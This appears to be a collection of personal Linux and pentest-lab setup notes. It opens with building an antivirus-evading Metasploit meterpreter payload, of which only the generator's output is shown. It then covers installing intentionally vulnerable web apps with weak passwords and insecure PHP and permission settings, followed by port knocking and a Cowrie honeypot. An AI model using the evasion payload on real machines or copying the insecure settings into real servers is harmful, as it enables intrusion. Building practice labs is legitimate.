FUD (Fully Un Detectable) Payload with CUSTOM-meterpreter

This payload can’t be detected by TrendMicro
# apt-get install mingw-w64
# cd /root
    Automatic C source code generator – FOR METASPLOIT
           Based on rsmudge metasploit-loader
Metasploit server IP :
Metasploit port number : 4444
(+) Compiling binary ..
-rw-r–r– 1 root root 2180 Feb 27 00:50 temp.c
(+) -rwxr-xr-x 1 root root 13312 Feb 27 00:50 payload.exe

Installing FireFox on Debian

# echo “deb http://mozilla.debian.net/ jessie-backports firefox-release” >> /etc/apt/sources.list.d/mozilla-firefox.list
# cat /etc/apt/preferences.d/mozilla-firefox
Package: *
Pin: origin mozilla.debian.net
Pin-Priority: 501

# apt-get update
# apt-cache policy firefox
  Installed: 51.0.1-3
  Candidate: 51.0.1-3
  Version table:
 *** 51.0.1-3 1001
       1001 http://mirrordirector.archive.parrotsec.org/parrot stable/main amd64 Packages
        100 /var/lib/dpkg/status
     51.0.1-3~bpo80+1 501
        501 http://mozilla.debian.net jessie-backports/firefox-release amd64 Packages

# apt-get install firefox -y

Installing Kali tool on Debian

We need katoolin for that purpose

# cd /root
# cd katoolin
# ln -s katoolin.py katoolin
# chmod +x katoolin
# ./katoolin
1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 1
1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> 1

1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> 2

1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> back

1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 2

1) Information Gathering                        8) Exploitation Tools
2) Vulnerability Analysis                       9) Forensics Tools
3) Wireless Attacks                             10) Stress Testing
4) Web Applications                             11) Password Attacks
5) Sniffing & Spoofing                          12) Reverse Engineering
6) Maintaining Access                           13) Hardware Hacking
7) Reporting Tools                              14) Extra
0) All
Select a category or press (0) to install all Kali linux tools .
kat > 0
Do you want to continue? [Y/n]

1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 3
Do you want to install classicmenu indicator ? [y/n]> y

1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 4
Do you want to install Kali menu ? [y/n]> y

Installing RDP Server on Linux

In my example, I’ll use Debian 8 as my example.
But you can install it on other linux too

-install xrdp server and xfce desktop
# apt-get install xrdp xfce4 -y

-enable xrdp on every reboot
# systemctl enable xrdp.service
# systemctl restart xrdp.service

-enable xfce on every rdp connection
# echo “xfce4-session” > /root/.xsession
# echo “xfce4-session” >> /etc/xrdp/startwm.sh

Installing Vulnerable bWAPP, DVWA, Joomla, Mutillidae2, SQLi-Labs, XAMPP, WordPress on TurnKey LAMP

Download and install TurnKey LAMP ova from
set VBox Settings/Display/Screen/Video Memory to 6MB
set NIC1 to Bridge in VBox
Set NIC2 to Host only
click Advanced Menu
select Networking, click Select
Set eth0 to dhcp and eth1 to static


# cd /root
# apt list –installed
find apache and mysql packages name there
# service mysql stop
# apt-get purge mysql-server mysql-client mysql-common
# apache2ctl stop
# apt-get purge apache2 apache2-utils apache2.2-bin
# apt-get autoremove

# apt-get autoclean

-download xampp
# chmod 755 xampp-linux-x64-5.6.30-0-installer.run
# ./xampp-linux-x64-5.6.30-0-installer.run
Welcome to the XAMPP Setup Wizard.
Select the components you want to install; clear the components you do not want
to install. Click Next when you are ready to continue.
   XAMPP Core Files : Y (Cannot be edited)
   XAMPP Developer Files [Y/n] :
   Is the selection above correct? [Y/n]:
Installation Directory
   XAMPP will be installed to /opt/lampp
   Press [Enter] to continue:
Setup is now ready to begin installing XAMPP on your computer.

   Do you want to continue? [Y/n]:

# cd /opt/lampp
# sed -i s/’local’/’all granted’/ etc/extra/httpd-xampp.conf
# lampp start
-to restart apache only
# /opt/lampp/bin/apachectl restart

-apache docs location on /opt/lampp/htdocs

bWAPP (Buggy Web Application)
# cd /root
# mkdir -p /opt/lampp/htdocs/bwapp
# mv download?source=files bwapp/bWAPP_latest.zip /opt/lampp/htdocs/bwapp/bwapp.zip
# cd /opt/lampp/htdocs/bwapp
# unzip bwapp.zip
# rm bwapp.zip
# vi bWAPP/admin/settings.php
set this part

$db_password = “”;

# cd bWAPP
# chmod 777 documents images passwords
-open your browser and go to
click on here
L: bee
P: bug


-download dvwa
# cd /root
# mv DVWA /opt/lampp/htdocs/dvwa
# cd /opt/lampp/htdocs/dvwa
# chmod 766 hackable/uploads
# chown root:root hackable/uploads
# chmod 766 external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
with your gmail account
click Continue
click Get reCAPTCHA
on Label and Domains type your domain i.e: domain.com
click Register
You will get Site and Secret key
# cd /opt/lampp/htdocs/dvwa/config
# cp -p config.inc.php config.inc.php.bak
# vi config.inc.php
-set your mysql root password
$_DVWA[ ‘db_password’ ] = ‘Passw0rd’;
-insert Site > public key and Secret > private key into this part
$_DVWA[ ‘recaptcha_public_key’ ]  = ‘6LdaMRYUAAAAAGH_Wjgn15xUmdcXTMP9YpBJ7y3n1’;

$_DVWA[ ‘recaptcha_private_key’ ] = ‘6LdaMRYUAAAAALsTFuYgrGbeozX2efE3EOz11T5x1’;

Set “allow_url_include = On”
# sed -i s/’allow_url_include=Off’/’allow_url_include=On’/ /opt/lampp/etc/php.ini
# /opt/lampp/bin/apachectl restart
go to
click Create/Reset Database
go to
L: admin

P: password

# cd /root
# mv joomla_3-6-5-stable-full_package-zip\?format\=zip joomla-3.6.5.zip
# unzip joomla-3.6.5.zip -d joomla
# mv joomla /opt/lampp/htdocs
# cd /opt/lampp
# sed -i s/’display_errors=On’/’display_errors=Off’/ etc/php.ini
# sed -i s/’output_buffering=4096’/’output_buffering=Off’/ etc/php.ini
# cd /opt/lampp/htdocs/joomla/
# cp installation/model/configuration.php .
# chmod 777 configuration.php
# /opt/lampp/bin/apachectl restart
go to
Select Langunage: English (United States)
Site Name: joomla
Site Offline: Yes
Administrator Email: admin@gmail.com
Administrator Username: root
Administrator Password:
Confirm Administrator Password:
click Next
Database Type: MySQLi
Host Name: localhost
Username: root
Database Name: joomla
Table Prefix: j00mla_
Old Database Process: Backup
click Next
click Next
Install Sample Data: Learn Joomla English (GB) Sample Data
Email Configuration: No
click Install
click Remove installation folder
if you got error
# cd /opt/lampp/htdocs/joomla
# rm -rf installation
# chmod 644 configuration.php
go to
L: root


NOWASP Mutillidae 2
# cd /root
# apt-get install software-properties-common python-software-properties php5-curl -y
# mv download\?source\=files mutillidae.zip
# unzip mutillidae.zip
# mv mutillidae /opt/lampp/htdocs/
# cd /opt/lampp/htdocs/mutillidae
# vi classes/MySQLHandler.php
set your MySQL password here
        static public $mMySQLDatabasePassword = “”;
-only allow access from your network
# vi .htaccess
Allow from
# /opt/lampp/bin/apachectl restart
go to
click setup/reset the DB
click OK


# cd /root
# unzip master.zip
# mv sqli-labs-master /opt/lampp/htdocs/sqli
# cd /opt/lampp/htdocs/sqli
# vi sql-connections/db-creds.inc
set mysql password i.e.
$dbpass =”;
open browser and go to
click Setup/reset Database for labs


-because TurnKey LAMPP doesn’t have required gcc for compiling pcre lib, we need to do this in other Ubuntu server.
After compiling then copy the lib into TurnKey LAMPP
download pcre
# cd /root
# tar xf pcre-8.40.tar
# cd /pcre-8.40
# ./configure –prefix=/tmp –enable-utf8 –enable-unicode-properties ; make ; make install
# cd /tmp
# tar cf lib.tar lib

# scp lib.tar root@

-copy lib into /opt/lampp/lib
# cd /opt/lampp/lib
# cp /tmp/lib/* .

-create empty wordpress db
go to
click New on top left
Create database: wordpress

click Create

# mv WordPress /opt/lampp/htdocs/
# cd /opt/lampp/htdocs
# mv WordPress wordpress
# cd /opt/lampp/htdocs/wordpress
go to

click Let’s go!

Database Name: wordpress
Username: root
Password: Passw0rd
Database Host: localhost
Table Prefix: wp_
click Submit
You will get warning “Sorry, but I can’t write the wp-config.php file”.
Paste the content shown into wp-config.php
# vi wp-config.php

click  “Run the install”

Information needed
Site Title: wordpress
Username: root
Password: Passw0rd
Your Email:
Search Engine Visibility:
click Install WordPress

-you can go to for admin purposes

Create xampp startup script
# cat /etc/init.d/lampp
#! /bin/sh
# Provides:             xampp
# Required-Start:       $remote_fs $syslog
# Required-Stop:        $remote_fs $syslog
# Default-Start:        2 3 4 5
# Default-Stop:         0 1 6
# Short-Description: Execute the xampp command.
# Description:
case “$1” in
        /opt/lampp/lampp start
        /opt/lampp/lampp restart
        /opt/lampp/lampp stop
        /opt/lampp/lampp status
        echo “Usage: $0 start|stop|restart|status”

# chmod 755 /etc/init.d/lampp
# insserv -d /etc/init.d/lampp
# systemctl enable lampp

Port Knocking

BY using port knocking, we can open or close the port if we know the knock order

VM: KALI2 (Server) KALI2 (Client)

KALI2 (Server)
# apt-get install knockd -y
# cat /etc/default/knockd

# cat /etc/knockd.conf
#change eth1 accordingly
sequence = 7000,8000,9000
seq_timeout = 5
command = /sbin/iptables -I INPUT -s %IP% -p tcp –dport 22 -j ACCEPT
tcpflags = syn
sequence = 9000,8000,7000
seq_timeout = 5
command = /sbin/iptables -D INPUT -s %IP% -p tcp –dport 22 -j ACCEPT
tcpflags = syn

# iptables -A INPUT -i lo -j ACCEPT
# iptables -A INPUT -m conntrack –ctstate ESTABLISHED,RELATED -j ACCEPT
# iptables -A INPUT -p tcp –dport 22 -j REJECT
# iptables -S
# mkdir /etc/iptables
# iptables-save > /etc/iptables/rules.v4
# iptables-restore < /etc/iptables/rules.v4
-if using ip6
# ip6tables-save > /etc/iptables/rules.v6
# ip6tables-restore < /etc/iptables/rules.v6
# service knockd start

KALI2 (Client)
-nmap shown ssh port filtered
# nmap
22/tcp filtered ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds

# apt-get install knockd -y
# ssh root@
connection refused
# knock 7000 8000 9000
# ssh root@
connection successful
# knock 9000 8000 7000
# ssh root@
connection refused

Cowrie SSH Honeypot

# cd root
# vi /etc/ssh/sshd_config
Port 22
Port 2222
# service ssh reload

# apt-get install git python-dev python-openssl openssh-server python-pyasn1 python-twisted authbind

# adduser –disabled-password cowrie
Adding user `cowrie’ …
Adding new group `cowrie’ (1002) …
Adding new user `cowrie’ (1002) with group `cowrie’ …
Changing the user information for cowrie
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
# touch /etc/authbind/byport/22
# chown cowrie:cowrie /etc/authbind/byport/22 && chmod 777 /etc/authbind/byport/22

# su – cowrie
$ cd  cowrie
$ virtualenv cowrie-env
Running virtualenv with interpreter /usr/bin/python2
New python executable in /home/cowrie/cowrie/cowrie-env/bin/python2
Also creating executable in /home/cowrie/cowrie/cowrie-env/bin/python
Installing setuptools, pkg_resources, pip, wheel…done.

$ source cowrie-env/bin/activate
(cowrie-env) $ pip install pycrypto Crypto
(cowrie-env) $ pip install -r requirements.txt
$ cp cowrie.cfg.dist cowrie.cfg
$ pico cowrie.cfg cowrie.cfg
hostname = svr01
listen_port = 22
$ cd data
$ ssh-keygen -t dsa -b 1024 -f ssh_host_dsa_key
$ cd ..
$ export PYTHONPATH=/home/cowrie/cowrie
$ pico start.sh

$ ./start.sh

-to start cowrie using root a/c
need to find out

-to stop cowrie
# /home/cowrie/cowrie/stop.sh